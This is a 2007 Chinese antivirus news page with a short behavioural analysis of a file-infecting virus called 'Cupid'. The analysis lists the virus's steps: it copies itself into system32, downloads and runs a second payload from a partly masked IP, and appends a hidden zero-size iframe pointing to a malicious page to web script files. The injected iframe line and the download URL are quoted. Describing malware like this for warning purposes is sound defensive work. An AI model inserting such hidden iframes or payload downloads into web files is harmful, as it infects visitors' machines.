全站资讯检索:
 
您现在的位置: 猫头鹰病毒资讯网 >> 病毒预警 >> 病毒预警 >> 文章正文
来无踪 去无影 小心“丘比特”病毒
作者:李铁军    文章来源:赛迪网    点击数:    更新时间:2007-6-1

一个网站挂了10来个马,爆强,看到IE状态栏不停闪烁的跳转,只有吃惊的份儿。

其中一个新病毒,毒霸管它叫丘比特,以下是详细分析报告。

该病毒是一个感染型病毒。该病毒会感染后缀为.exe、.scr的可执行文件和.htm、.html、.asp的脚本文件。(李俊太有才了,自熊猫后,越来越多的病毒感染网页格式的文档)

1、将自身拷贝到系统目录下

%SystemRoot%\system32\love.exe

2、该病毒将urlmon.dll拷贝一份名为ok.dll,加载并调用其导出函数URLDownloadToFileA下载并运行另一病毒,其下载路径为

http://63.223.96.***/zcx.exe

3、在脚本尾加

%iframe src=http://63.223.96.***/ma6.htm width=0 height=0%%/iframe%

4、该病毒运行后会自删除。

文章录入:菜猫    责任编辑:菜猫 
 
相关文章
木马“热血盗号者”专偷“热血江湖”用户账
江民科技07月20日病毒播报
瑞星公司07月20日计算机病毒及木马播报
江民科技07月19日病毒播报
瑞星公司07月19日病毒及木马播报
江民科技07月15日播报:“玛格尼亚”和“U盘
瑞星07月15日播报:“代理蠕虫变种OC”病毒
瑞星07月14日播报:“代理蠕虫变种OC”病毒
瑞星7月11日播报:“卤猪(Win32.iuhzu.a)
江民7月8日病毒播报:“QQ蜜”和“比福洛斯
瑞星7月8日播报:“代理蠕虫变种Z”病毒
瑞星公司7月7日播报:网络游戏木马变种
相关评论
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
::发表评论::
姓 名:* (必填项)
E-mail: QQ:
评 分: 1分 2分 3分 4分 5分
评论内容:
  • 严禁发表危害国家安全、政治、黄色淫秽等内容的评论。
  • 评论人需对自己在使用评论过程中的行为承担法律责任。
  • 本站管理员有权保留或删除评论内容。
  • 游客发表评论须经管理员审核后才能发表。
  • 评论内容只代表个人观点,与本网站立场无关。
 
设为首页 | 收藏本站 | 关于我们 | 联系我们 | 刊登广告 | 版权声明 | 友情链接 | 网站地图
猫头鹰反病毒资讯网所有信息来自互联网及网友提供,如侵犯了你的权益,请来信告知,我们将立即删除!
Copyright © 2007-2008 MoToYi.com All rights reserved
本站为你提供病毒木马的防治方案,专杀工具和防护软件的下载,系统及网络的安全技巧,手机病毒发展趋势.